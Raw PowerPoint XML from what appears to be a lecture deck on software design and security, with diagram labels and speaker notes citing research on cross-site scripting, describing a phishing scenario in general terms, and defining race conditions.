          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="2557221" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="2557221" y="147938"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="147938"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="29587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9BBFD8-66DC-447C-A7F7-9025F9B65D4E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3410331" y="590520"/>
          <a:ext cx="1408937" cy="70446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kern="1200" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Database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kern="1200" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Program</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3410331" y="590520"/>
        <a:ext cx="1408937" cy="704468"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D46A0449-8284-4FC4-8A6F-3729692E647B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="853110" y="1590865"/>
          <a:ext cx="1408937" cy="704468"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">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kern="1200" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Sales</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="853110" y="1590865"/>
        <a:ext cx="1408937" cy="704468"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{97A02F98-0DA5-4BFE-9B2E-CABF10BF6705}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="703" y="2591211"/>
          <a:ext cx="1408937" cy="704468"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="50000"/>
            <a:lumOff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kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Sell on Web</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="703" y="2591211"/>
        <a:ext cx="1408937" cy="704468"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BB6ABBFC-5BBA-40FB-A5A5-81F3E3CB2BED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1705517" y="2591211"/>
          <a:ext cx="1408937" cy="704468"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="50000"/>
            <a:lumOff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kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Sell to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kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Distributor</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1705517" y="2591211"/>
        <a:ext cx="1408937" cy="704468"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9369E97E-D19A-4059-8154-B7F4A3CFC471}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3410331" y="1590865"/>
          <a:ext cx="1408937" cy="704468"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">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kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Accounting</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3410331" y="1590865"/>
        <a:ext cx="1408937" cy="704468"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B617239B-B65B-41CB-BA87-91E40F7B35E6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3410331" y="2591211"/>
          <a:ext cx="1408937" cy="704468"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="50000"/>
            <a:lumOff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kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Adjust Price</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3410331" y="2591211"/>
        <a:ext cx="1408937" cy="704468"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8E195A78-D8B0-49B2-8C96-049C38AECFD7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5967552" y="1590865"/>
          <a:ext cx="1408937" cy="704468"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">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kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Manufac</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2100" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a: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kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>turing</a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2100" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:effectLst/>
            <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5967552" y="1590865"/>
        <a:ext cx="1408937" cy="704468"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A3E19407-807E-4B19-AE00-6DF66E45FB12}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5115145" y="2591211"/>
          <a:ext cx="1408937" cy="704468"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="50000"/>
            <a:lumOff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kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Add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kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Inventory</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5115145" y="2591211"/>
        <a:ext cx="1408937" cy="704468"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B406F2D1-5E5D-48F4-8AE4-3571D8EC48AA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6819959" y="2591211"/>
          <a:ext cx="1408937" cy="704468"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="50000"/>
            <a:lumOff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kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Ship Order</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6819959" y="2591211"/>
        <a:ext cx="1408937" cy="7044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BD4541-6123-4D9E-A370-AEF53F86E4FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="3432810" cy="11658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Write Test Cases</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="34147" y="34147"/>
        <a:ext cx="2174755" cy="1097566"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE08BA51-7747-40B9-B7D9-8C6AB5C4E8CC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="302894" y="1360170"/>
          <a:ext cx="3432810" cy="11658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Review Test Cases</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="337041" y="1394317"/>
        <a:ext cx="2303812" cy="1097566"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{94E6A411-476C-4443-9AA0-E8FD333414C4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="605789" y="2720340"/>
          <a:ext cx="3432810" cy="11658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Automate Test Cases</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="639936" y="2754487"/>
        <a:ext cx="2303812" cy="1097566"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{95AF9D3B-6620-4A6F-8C76-1840FBF83E3E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2675001" y="884110"/>
          <a:ext cx="757809" cy="757809"/>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2845508" y="884110"/>
        <a:ext cx="416795" cy="570251"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C1E03F05-2C66-4C4A-A352-69163AADE5EF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2977896" y="2236508"/>
          <a:ext cx="757809" cy="757809"/>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3148403" y="2236508"/>
        <a:ext cx="416795" cy="57025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22DD010-8937-45C8-854C-DF0F9734C2D6}"/>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7411" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{752514DF-F936-4FF6-8FB7-4908EA96C26B}"/>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2292" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35FCE278-8023-4F13-96D1-3FB1219A3B0F}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{419E3590-9BD2-41CC-9BF5-2B20DF1FCB33}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57DB34C8-8DC8-40CD-B272-2A1F3ED5FCCD}"/>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7415" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74AEE9E6-CA28-4FCB-8E66-C7E4ADA33400}"/>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844F4E8-1FF8-48AB-9FD5-11ED7276BB1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55111C61-6489-4E2D-B17B-10017B7ACB2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B165B2E-515C-48D3-B047-CCE95507213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340" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0934599C-8179-4AAB-9715-69DD0278CE6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820D909-DDFC-4DC1-A157-A2748880B83A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>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50C1A721-6B84-4993-A11C-483A8985B1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8509F76-8980-4083-8E9C-58484CE4BA91}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54AC1FE6-547A-4D3A-9EA7-F16F3BE22559}"/>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A64E4388-17AA-4938-BB5D-848BFF9DBDE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Data can be separated from control using two TCP Ports, for example, or different message types.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53814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F1A14123-7A46-43CE-BD3A-DC549A3AEBA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8C4F15F-11DD-4CA9-BE64-E635B083D84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Research on Cross-site Scripting Vulnerability of XSS Based on International Student Website, T Wang, D Zhao, J Qi, 2022 International Conference on Computer Network, Electronic and Automation (ICCNEA) IEEE, 2022.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Another Example: I get emails from ISACA that contain links to areas of their website.  An attacker sends me a bogus email that looks like ISACA’s, with a link to a copy of an ISACA page that the attacker has modified to contain malicious code or links to black-hat websites.  Because the modifications are all executed on the client’s computer, nothing unusual happens on ISACA’s server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33796" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1204C010-63AF-4DB0-9956-52E3FBBD750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3F1492D-BACD-4870-855C-E820E0852923}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26405143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F1A14123-7A46-43CE-BD3A-DC549A3AEBA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8C4F15F-11DD-4CA9-BE64-E635B083D84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Practical analysis on the algorithm of the Cross-Site Scripting Attacks, B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Abazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, E </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hajrizi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Proc. 29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" baseline="30000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> International Conference on Systems, Signals and Image Processing IWSSIP 2022, June 1-3, 2022, Bulgaria, IEEE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33796" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1204C010-63AF-4DB0-9956-52E3FBBD750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3F1492D-BACD-4870-855C-E820E0852923}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25956504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Practical analysis on the algorithm of the Cross-Site Scripting Attacks, B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Abazi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, E </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hajrizi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Proc. 29th International Conference on Systems, Signals and Image Processing IWSSIP 2022, June 1-3, 2022, Bulgaria, IEEE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{006D0218-2B54-4A95-9FE9-6F57B92F1A87}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2261251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Research on Cross-site Scripting Vulnerability of XSS Based on International Student Website, T Wang, D Zhao, J Qi, 2022 International Conference on Computer Network, Electronic and Automation (ICCNEA), IEEE, 2022.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{006D0218-2B54-4A95-9FE9-6F57B92F1A87}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7604496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OWASP Top 10, 2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{006D0218-2B54-4A95-9FE9-6F57B92F1A87}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14392800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0DE3FDE5-EF00-446C-A252-09C4CE0C61AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A83E8459-9B75-41CC-A730-9E5506C0918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 race condition occurs when multiple threads or processes need the same resources to complete their tasks.  If not synchronized properly, one or more may become ‘starved’ and unable to finish, or unpredictable errors may occur.  A race condition was cited as the original cause of the 2003 (electricity) blackout in the northeastern U.S.  Another nearly scuttled the Mars rover Spirit’s mission.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50180" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{522EC992-D5EC-4197-92F8-7F78CCE471B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B5011EC-CE44-436B-BA3A-20391CEBB68D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
